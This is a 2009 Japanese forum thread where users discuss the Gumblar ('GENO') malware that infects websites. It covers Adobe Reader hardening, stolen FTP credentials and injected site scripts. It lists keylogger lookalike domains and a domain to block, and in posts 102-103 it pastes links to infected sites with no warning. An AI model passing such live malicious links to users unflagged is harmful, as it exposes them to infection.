GENOウイルススレ　★3

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 801- 901- 1001- 2chのread.cgiへ]
Update time : 05/09 17:40 / Filesize : 219 KB / Number-of Response : 1002
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

GENOウイルススレ　★3

1 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 02:26:23 ]: 感染が疑わしい人は迷わずクリーンインストール推奨です。

★Anubisレポート
anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★過去スレ
GENOウイルススレ　★2
pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
pc11.2ch.net/test/read.cgi/sec/1239152979/

以下、おまいらテキトーに調査結果、感染サイト情報、テンプレ等をコピペしてくださいです。。。
2 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 02:34:58 ]: 重複
3 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 02:42:34 ]: >>1
乙
4 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 02:45:33 ]: >>1乙

>>2
重複してねーよ。GENO社員乙
5 名前：名無しさん＠お腹いっぱい。 [2009/04/28(火) 11:01:22 ]: このサイトをブックマーク推奨
ttp://www3.atword.jp/gnome/
6 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 12:41:19 ]: テーマ曲

www.youtube.com/watch?v=0x8IMnFCEAM
7 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 12:55:24 ]: >>1
乙でした
8 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 13:06:12 ]: 　　解決したね
　　次スレいらね

とか

　　もうネタもないし
　　次スレいらね

は、もはや様式美なのでスルーしてください。
9 名前：名無しさん＠お腹いっぱい。 [2009/04/28(火) 13:53:01 ]: >>5
これよく出てくるけど、何のサイトだろう
10 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 16:47:29 ]: >>6
Judas Priest - Genocide 　(w
11 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/28(火) 19:12:56 ]: 重複
12 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 01:34:00 ]: >>9
GENO含めたセキュリティ対策情報のブログちゃん
13 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 01:45:06 ]: >>5
ν速でftp使うなっていってた人より情報速かったな
14 名前：名無しさん＠お腹いっぱい。 [2009/04/29(水) 07:22:48 ]: Genoウィルス祭り再び？　Adobe Readerの新たなゼロデイ脆弱性に対する攻撃コードが公開
tsushima.2ch.net/test/read.cgi/news/1240948172/l50
15 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 10:03:55 ]: キャッシュ削除したらお金が降ってきました！
美女がくっついて離れません！
全てがうまくいきました！
16 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 17:39:18 ]: むかし、注文個数０．００１とかして遊んでたことあったろ？
アレの反撃だよたぶん
17 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 19:20:10 ]: このGENOウィルスも豚インフルの大流行を見越しての仕込み
だったとしたならば作った奴はかなりの強者
18 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 19:21:31 ]: 強者
↑これって読みは”きょうじゃ”じゃなくて”きょうしゃ”だったのか
知らんかった
19 名前：某所からコピペ mailto:sage [2009/04/29(水) 19:47:35 ]: 諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

１．Adobe Readerを起動し「編集」メニューの「環境設定」
　　「Acrobat JavaScriptを使用」のチェックボックスをオフ（チェックを外す）
　　OKを押して設定確定後、Adobe Readerを終了。
↓
２．必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
　　設定は SpeedUp - Fast がおすすめ。
　　　注意すべきは
　　　Acroform（拡張子なし）
　　　Annotations（拡張子なし）
　　　これら2つのチェックボックスをオン（チェックが入っている）状態にしておく必要がある。
　　　そうしないと Adobe Reader が起動しなかったりする。

　　　このとき追加作業として
　　　EScript.apiとEScript.JPNのチェックボックスをオフ（チェックを外す）状態にしておくと
　　　より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Reade以外の環境設定をどうするかも各自考える必要があります。
20 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 20:02:10 ]: >>19

ShellExView などで Adobe PDF Link Helper を無効にしておくと、よりいいかも。
無効にしても「PDFファイルが全然開けなくなる」訳ではなさそう。

蛇足だが
×＞Adobe Reade
○＞Adobe Reader
21 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 21:18:47 ]: >>19-20

Adobe Reader Speed Launcher をスタートアップから外す
こともやったほうがいいですよ。

レジストリの書き換えが必要ですけど
「いじくるつくーる」などのソフトを使えばレジストリを意識せずに楽勝です。
22 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 22:55:43 ]: >>19-21
これは本当のことですか？
それとも釣りですか？
なんかもう何を信じていいのかわからない…
23 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 22:56:13 ]: >>18
釣られてやろう
いまどきの中国産のＩＭＥは
コワモテは変換できてもツワモノは変換されない
24 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 23:15:34 ]: >>22
自分を信じろ
25 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 23:24:05 ]: 強面
兵
26 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/29(水) 23:56:55 ]: 漢字二通りあるからなあ
27 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 00:39:01 ]: GENOは対応が糞レベルだったんで晒しておいても問題ないが、
zlkonでも検索できるようにした方が良かったんじゃないかな？
28 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 01:19:17 ]: これはGeno？

yaplogjp.com/blog/
29 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 01:44:25 ]: >>28
違うけどヤプログの偽者
MMO界隈で有名な中華のドメイン
アカウントを盗む目的でキーロガーを仕込む
30 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 05:52:50 ]: MMO界隈で有名なドメイン名の例（GENOウイルスではないが危険）

アカウントハック（アカウントを盗む）目的で、キーロガーを仕込む

踏むな危険→yaplogjp.com←踏むな危険
踏むな危険→atewikijp.com←踏むな危険
踏むな危険→gomenifty.com←踏むな危険
踏むな危険→aimeblog.com←踏むな危険
踏むな危険→cavle-online.com←踏むな危険
31 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 13:51:15 ]: 次スレいらないね
32 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 13:59:39 ]: GENO社員乙
33 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 14:02:00 ]: ラトビア特急、路線拡大中

2009/04/09(木)　 7560 個
2009/04/17(金)　 8567 個
2009/04/19(日)　11795 個
2009/04/27(月)　15096 個
2009/04/30(木) 13456 個のドメインを感染させています。

少し落ち着いてきたかな？
34 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 14:07:10 ]: >>31
はええよｗ
35 名前：名無しさん＠お腹いっぱい。 [2009/04/30(木) 14:32:19 ]: ﾌﾟ
36 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 14:51:35 ]: >>31
早漏乙
37 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 14:52:37 ]: >>28
踏んでしまったとしたらOS入れなおし推奨だよ
38 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 16:14:55 ]: このウイルスってPdfが読めないと感染しないのでしょうか？
もしそうだとしたら例えば普段　Foxit ReaderをUSBメモリに入れて置いて、読むときだけ繋げたりしたら…。
面倒くさいですけど。
39 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 17:27:57 ]: 感染して自分のサイトにスクリプト埋め込まれた。
サイト直して、OSクリーンインスコしたが、また自サイトがやられてたので、
FTPログ調べたら、海外から勝手に書き換えられてた模様。

感染中に接続したFTPのIDとPASSがどっかに送られてたんだろうな．．．
FTPのパス変えないと他の感染マシンからやられる感じだ。

.htmlファイルは bodyタグの前に、
.jsファイルは最終行にそれぞれ埋め込まれてたお。
40 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 17:49:09 ]: >>39
二次被害出さないようにしろよ
41 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 18:04:57 ]: >>40
誠にお恥ずかしい。
パス変えて、こまめにログチェックするお
42 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 18:13:08 ]: >>39
その海外の接続先は特定出来ないの？
43 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 18:19:58 ]: 2箇所からアクセスがあって、どっちもIPの割当国はアメリカだった。
多分、どっかで感染したクライアントPCじゃないかな。
44 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 18:20:23 ]: >>39
FTP以外も監視してるかもしれないらしいからWebのフリーメール
なんかを使ってたらそのへんもパスワード変更推奨
参考サイト
www3.atword.jp/gnome/2009/04/19/scansafe-reported-the-zlkon-virus-progress/
www.so-net.ne.jp/security/news/view.cgi?type=2&no=1868

あと被害サイトを訪問しちゃった人のためにちゃんと告知してあげてね
45 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 18:22:19 ]: アクセス元はきっとゾンビだと思うよ
46 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 18:22:43 ]: >>44
うん、その辺も全部変えた。
FTPログ見たら、書き換えられてから直すまでの訪問者ゼロwww

Orz
47 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 18:24:00 ]: 間違い。FTPログじゃなくてWebの方のアクセスログね．．．Orz
48 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 19:52:29 ]: ゴールデンウィークはOSのクリーンインストールをしましょう！
49 名前：名無しさん＠お腹いっぱい。 [2009/04/30(木) 21:13:35 ]: カスペオンラインスキャン壊れた！
何度もページ再読み込みして止まらない…
トレンドマイクロみたく乗っ取られたかな？

www.kaspersky.com/kos/jp/partner/default/pages/default/check.html?n=1241092961537
50 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 21:14:14 ]: >>46
普段それなりに閲覧者がいるサイトだったとしたらそれは不自然かもしれない
元から自分のオナニー用サイトなら問題ないかも

ログファイルを書き込みロックしたり上書きしたりなんてことも
ありえるのかなーとおもったけど、どうなんだろうね
51 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 21:17:08 ]: >>49
異常あるようには見えない
なんでもかんでも壊れたっていうんじゃなくて
自分の環境を疑ったほうが良いと思うよ
52 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 21:30:11 ]: Adobe Reader/Acrobatに新たな脆弱性、回避策はJavaScript無効化
ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html
53 名前：名無しさん＠お腹いっぱい。 [2009/04/30(木) 21:44:16 ]: Adobe Readerなんてほんとインストールするもんじゃないな
54 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 21:51:18 ]: >>52
ttp://internet.watch.impress.co.jp/cda/news/2009/04/30/23328.html
>また、現時点でこの脆弱性の悪用が一般に出回っていることは確認されていないとして、

おい、ちょっと待てw
55 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/04/30(木) 22:56:15 ]: PDF表示だけにしときゃいいものをゴテゴテ機能付けるからこうなるんだよな・・・
56 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 00:32:25 ]: アドビは重くて穴だらけだな
57 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 00:47:52 ]: >>54
つまり他にも山ほど脆弱性があるんですよ
58 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 00:54:27 ]: 　　　　　( ´･ω･)　　　みんな～メキシコ土産だよ～
　　　　　( っ¶¶と
　　　　(ニ二二二ニ)
　　　　 )=========(
　　　　()　　　.()　｜
　　　/ヽ======/、
　　((　ﾚ |ヽ＿／､｜ ))
　　　　　|/ ｜　|/
　　　　　　/ハ
　　　　　　ﾍ⌒ヽﾌ
　　　　　 ( 　・ω・）
　　　　　｛　 U　Ul
　　　　　ヾ.,____,ノ
59 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 01:19:21 ]: >>56
>>19-21を適切に行えば、軽くなるし穴も減らせる。
60 名前：名無しさん＠お腹いっぱい。 mailto:age [2009/05/01(金) 03:34:27 ]: 　　　　_＿＿ハ＿＿
ﾁｬ　　　、＿＿＿＿丿
　ﾁｬ　　　ﾞﾞ(　ﾟ━ﾟ)　　ｱﾐｰｺﾞ
　　ﾁｬ　　／ﾞﾞﾞc○c○))　ｱﾐｰｺﾞ

ﾁｬ　　　＿＿ハ＿＿
　ﾁｬ　　、＿＿＿＿丿
　　ﾁｬ　　 (ﾟ━ﾟ　)´´　　ﾊﾊﾞﾈﾛ
　　(((　○。○。ﾞﾞﾞ＼　　　ﾊﾊﾞﾈﾛ
61 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 09:15:30 ]: >>51
よく居るんだ・・・

手元のPCがおかしいのに
「サーバーにつながらない！なんか設定変えた！？（怒」
「ネットワークできないんだけど！バグってんの！？（怒」
とか電話してくるやつがさ。

まずは隣の人に聞けっての('A`)

Adobe Readerはadmとかで設定を集中管理出来ないもんかね。
62 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 12:59:58 ]: ttp://www.nht-osaka.com/news/owabi.html
こんな感じでいっぱいあるんだろうな

スレは鎮火しぎみだけど
早く駆除ツールとか出てほしいけど放置なんかな
63 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 13:20:23 ]: 次スレいらないなぁ
64 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 14:07:40 ]: ファイル書き換えしちゃうから駆除はできても元に戻るわけじゃないのよね
駆除自体もファイルがころころかわるから難しいみたいだし
65 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 14:34:02 ]: きりがないからネット用のＰＣは別にした
ダウンロードしたファイル置き場も別にした
これはこれできりがないかも。。。
66 名前：名無しさん＠お腹いっぱい。 [2009/05/01(金) 15:25:38 ]: Adobe Readerもういらない。
アンインストールしようとしたら
なかなかしぶとかった。
で、ＰＤＦは何でみようかな。。
67 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 16:46:05 ]: >>66
ＰＤＦを見れるマンガビューワーで良くない？
ＡｄｏｂｅＦｌａｓｈの代用ってあるんだろうか？
68 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/01(金) 17:09:08 ]: 全てsandboxie上で実行すれば
69 名前：名無しさん＠お腹いっぱい。 [2009/05/02(土) 03:33:24 ]: >>67-68
ありがとう。
70 名前：名無しさん＠お腹いっぱい。 [2009/05/02(土) 03:59:44 ]: これってFTP接続時にハックされるの？
それともFFFTPなんかのソフトにあるリストをハックするの？
71 名前：名無しさん＠お腹いっぱい。 [2009/05/02(土) 04:23:20 ]: このウイルスに感染すると
ｗｉｎｎｙとかｓｈａｒｅに異常がきたすって有るかな？
両方とも今までに無いエラーでおちた
72 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/02(土) 12:13:14 ]: >>71
は？死ねよ
73 名前：＞＞71 mailto:sage [2009/05/02(土) 12:18:13 ]: 　　/￣￣￣ / 　/''７ ./''７　　　　　　　　/￣/　 /''７
　./ ./￣/　/　　/__/ /　/ 　＿＿＿_　　￣　　/　/
　'ー'　_/　/ 　＿__ノ　/　 /＿_＿＿/ 　＿__ノ　/
　　　/___ノ　 /＿___,.／　　　　　　　　 /＿___,.／

　　　_ノ￣/　/￣/　 /''７　/￣￣￣/　　　/￣/　　　　　　　　　　　　/'''７'''７
/￣　　／　　￣　　/　/ 　￣ﾌ　./　　　/　　ﾞー-; 　＿＿＿_　　　/　/　/.＿
￣/　/　　　＿__ノ　/　　__／　 (___　　/　 /ｰ--'ﾞ　/＿_＿＿/　_ノ　/i　 i/ ./
　/__/　　　/＿___,.／　　 /___,.ノゝ＿/　/＿/　　　　　　　　　　　/__,／　ゝ､__/
74 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/02(土) 14:18:32 ]: >>70
接続時に見ています
75 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/02(土) 17:05:08 ]: >>71
ダウソ板から出てくるなよ
76 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/02(土) 18:28:18 ]: >>71
いろいろ感染してそう
77 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/02(土) 19:03:58 ]: 71が叩かれるのはなぜ？
78 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/02(土) 19:33:51 ]: 蹴飛ばし推奨ドメイン
gumblar.cn
79 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/02(土) 20:29:26 ]: >>78
thx! 早速対応した。
80 名前：名無しさん＠お腹いっぱい。 [2009/05/02(土) 23:23:54 ]: 忌野清志郎、死去　★2
tsushima.2ch.net/test/read.cgi/news/1241273616/

up2.viploader.net/pic/src/viploader999984.jpg
81 名前：名無しさん＠お腹いっぱい。 [2009/05/03(日) 04:23:27 ]: >>61
サーバがおかしいのに自分の使用しているPCに原因があると思って
いろんな設定いじったり、アンインストールしたりした事無いだろお前は
82 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 08:18:26 ]: 次スレいる？
83 名前：名無しさん＠お腹いっぱい。 [2009/05/03(日) 11:55:19 ]: ******* 危険 *******

照英オフィシャル・サイト
hxxp://www。s-progress。com/talent/show-a/
Analysis report for hxxp://www_s-progress_com/talent/show-a/
現在感染中（６日目に突入）
一応メール送ってるけど反応なし
2009.05.03 AM08 JST 継続

ソース↓
ttp://www3.atword.jp/gnome/
84 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 12:17:37 ]: >>83
乙ｗ鎮火するどころか新型インフルみたいにヌルヌル進行してるな
85 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 12:20:01 ]: 照英のも同型？
86 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 12:21:40 ]: GENOウイルスは進化してマッチョウイルスになった？
87 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 12:56:56 ]: GWで鯖缶もいないって状態なんだろうか
88 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 13:28:43 ]: 【鑑定目的禁止】検出可否報告スレ10
pc11.2ch.net/test/read.cgi/sec/1235459712/690-n
【ウィルス情報質問　総合スレッド★Part46】
pc11.2ch.net/test/read.cgi/sec/1224511070/876-n
89 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 16:10:44 ]: >>81
ユーザがおかしいのに自分の管理しているサーバに原因があると思って
いろんな設定いじったり、アンインストールしたりする事あるのかお前は
90 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 17:09:43 ]: ttp://www.pen-house.net/brand/brand0119.html
ここのペン先一覧に飛んだらavastがお怒りになられたんだが
もしかしてGENOウイルス罹ってる？
91 名前：名無しさん＠お腹いっぱい。 [2009/05/03(日) 17:21:15 ]: 大手が感染したらやばいな
92 名前：名無しさん＠お腹いっぱい。 [2009/05/03(日) 19:17:04 ]: 今回のウイルスってアクロバットリーダーのバージョン５
とか古すぎるやつにも対応してるの？
もし対応しててアウトならfoxitかな。最新版は重すぎるし。
でもfoxitはたまに読めないやつがあるんだよな。
93 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 19:20:12 ]: んな古いのはもう論外だろ
94 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/03(日) 23:55:56 ]: でも余計な機能が付いていないから踏んでも何も起きないんじゃないかと思うが
95 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 00:08:38 ]: >>94
ただ、もし脆弱性があったとしても、放置される可能性があるけどな。
96 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 01:50:41 ]: >>94
とっくに塞がれた他の穴が山ほど空いてるだろ…
97 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 01:54:41 ]: 放置される可能性があるなんてレベルじゃなく、ほぼ確実に放置なんじゃねーの？

>余計な機能が付いていない
表現能力が低い素のHTMLであってもそのブラウザに致命的なバグがどれだけあったか思い出せば、ね
そもそもPDF自体がPostScriptに色々機能をくっ付けた形式なわけで
98 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 01:56:04 ]: >>94
javascriptの機能がないバージョンなら問題ないだろ
99 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 09:44:33 ]: mosaicが懐かしい・・・
100 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 10:10:45 ]: >>99
Mosaicを実際に使っていた日本人ってかなり少なくないか？
翌年にはNetscape Navigatorが出てたし。
101 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 10:28:52 ]: PC98にFreeBSD(98)にX-WindowでMosaic
楽しかったな・・・
102 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 13:22:40 ]: ttp://www.s-progress.com/talent/show-a/
ttp://www.wellness.co.jp/
ttp://p-frying.com/gaiyo.html
ttp://sound.jp/yudai_marimba/index.html
103 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 13:59:41 ]: ttp://www.nenrei-hayami.net/
104 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 14:22:10 ]: >>102
踏んじまったじゃないか・・・
105 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 14:54:48 ]: >>102-103 のリンク先URL 踏むな危険！絶惨感染中

>>102-103
URLだけ黙って張るなんて……

踏んじゃったじゃないか……
さようなら……orz
106 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 14:58:05 ]: >83にあるURLをわざわざ踏むなんて……
107 名前：名無しさん＠お腹いっぱい。 [2009/05/04(月) 15:01:21 ]: >>102は罪に問われるんじゃないのかこれ
108 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 15:08:45 ]: >>102-103
てFLASHとreader最新にしとけば大丈夫とか関係なし？

踏んでないんだが、URLだけだと不意打ち食らうとキツイね。
firefox&NoScriptだったら、だいじょぶなのかな
109 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 15:11:46 ]: >>108
>てFLASHとreader最新にしとけば大丈夫とか関係なし？
Yes

>firefox&NoScriptだったら、だいじょぶなのかな
なおさら何の問題無い。（ただし、Noscriptの設定が全サイト許可になっていない場合）
110 名前：108 mailto:sage [2009/05/04(月) 15:14:25 ]: >>109
㌧

>>104-105
が踏んで…になってるから不安になっちまいました。
ここにいてもまだ対策してなかった or ギャグ　なのかな？
111 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 15:16:10 ]: 適当な記事にウソリンクでこれ貼られたら無防備に踏んでしまいそう。。
112 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 15:23:24 ]: >>107
最も罪に問われるべきは改竄した奴、
次いで(ゴールデンウィークとは言え)放置してる鯖管だろｗ
113 名前：名無しさん＠お腹いっぱい。 [2009/05/04(月) 15:35:45 ]: 102踏んでしまった・・・MACでも感染するのでしょうか？
114 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 15:56:04 ]: 心配するぐらいなら、クリーンインストールしとけ。

パスワードやデータが流出してからでは遅いぜ。
115 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 16:33:17 ]: ttp://www.java.com/ja/
Sunのページなんだけどここって感染してる？
なんか表示がおかしいし、ソースもおかしいんだけど。
116 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 16:45:08 ]: 鑑定スレじゃねーんだ失せろ
117 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 17:03:33 ]: >>115
実際にソース見てみると良いよ
最初の1000行以上が空白
Oracleって言うウィルスに感染してる
118 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 17:55:46 ]: それはたいへんだ　やばいんじゃないか
119 名前：名無しさん＠お腹いっぱい。 [2009/05/04(月) 17:59:45 ]: >>117

mjd?
ｵﾚこないだjavaダウンロードしちゃった！
それにもｳｲﾙｽ入ってんのかな!?
120 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 18:40:38 ]: >>117 の「最初の1000行以上が空白」について

参考までにWindows上のテキストエディターにて改行を数えてみたところ、
最初の空行（改行だけの行およびタブ+改行だけの行）は224行でした。
121 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 19:37:53 ]: 103 名前：名無しさん＠お腹いっぱい。投稿日：2009/05/04(月) 19:33:04
ttp://www.virustotal.com/analisis/a474db8500fb7b3456757048d535f5d0
ttp://www.virustotal.com/analisis/2332d6921a4d67aaa18af30e979ee20e
122 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 19:40:47 ]: 結局GENOウィルスとはなんだったのか
123 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 20:01:24 ]: 人生
124 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 20:09:11 ]: >>120
結局このウイルスはGENOとは違うみたいだがたいていのアンチウイルスソフト入れてれば防御＆検知可能なの？
125 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 20:16:38 ]: もうあれから行ってないなあ・・・お気に入りから速攻削除したし、行く気もしないな。
126 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 20:24:54 ]: さすがの情弱ももうそろそろあすこは危ないって気づいてるだろ
127 名前：名無しさん＠お腹いっぱい。 [2009/05/04(月) 20:45:11 ]: GENOウイルスについてのまとめサイトのURLってどこだったっけ？
128 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 20:48:17 ]: 忘れたが全然更新してなかった希ガス何故か誰も利用しない
129 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 21:09:42 ]: GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
130 名前：名無しさん＠お腹いっぱい。 [2009/05/04(月) 21:40:13 ]: ありがとう
131 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 22:43:47 ]: >>129 もよいですが >>5,>>9,>>12-13 も参考にすることを強くおすすめします
132 名前：名無しさん＠お腹いっぱい。 [2009/05/04(月) 23:26:10 ]: >>117
カスペで何もﾃﾞﾅｶｯﾀﾖ.
誤検知じゃないの？
133 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 23:30:29 ]: >>117
ただの冗談じゃなかったの？
ttp://www.oracle.com/lang/jp/index.html
134 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/04(月) 23:31:48 ]: >>132
あんたは、Oracleについてぐぐってこい。Sunを買収したとこだよ。
皮肉で言われていることだって気付くのが普通。
135 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/05(火) 00:49:53 ]: GENOウイルスでオタオタする人がオラクルについていちいち知ってるわけないだろ
本気で困るやつもいるんだから、ここだけは親切にいこうぜ
136 名前：名無しさん＠お腹いっぱい。 [2009/05/05(火) 01:00:10 ]: >>134

当方
情弱に於いて並ぶ者無し
137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/05(火) 01:04:57 ]: >>136
気にすんなｗ
知らないことなんて誰にでもあるさ
138 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/05(火) 20:20:38 ]: ver.5は大丈夫なのか。
139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 12:20:43 ]: >>19（亀レスですが）
１．がAdobe公式ページに載りました

Adobe - Security Advisories : APSA09-02 -
Buffer overflow issues in Adobe Reader and Acrobat
ttp://www.adobe.com/support/security/advisories/apsa09-02.html
140 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 12:23:35 ]: ｲﾝｽｺしてるｱﾝﾁｳｲﾙｽソフトのテストしたいんだけど
どっかにウイルス置いてるとこないですかね
141 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 12:45:34 ]: >>140
eicar でもやっとけ。
142 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 13:22:30 ]: >>141
ありがとうございます
どうやら無事仕事してくれていることを確認しますた
143 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 13:38:29 ]: ２ちゃんってほんと色んな事に詳しい人がいるんだなぁ…
>>19さん、疑ってごめん。
144 名前：19 mailto:sage [2009/05/06(水) 15:28:44 ]: 許さねぇ・・・
もう誰も信じねぇ・・・
145 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 15:35:00 ]: >>144
？どうした？
146 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/05/06(水) 15:37:31 ]: >>145

>>144はここの>>19と無関係の偽物。誤爆風愉快犯の暇人。
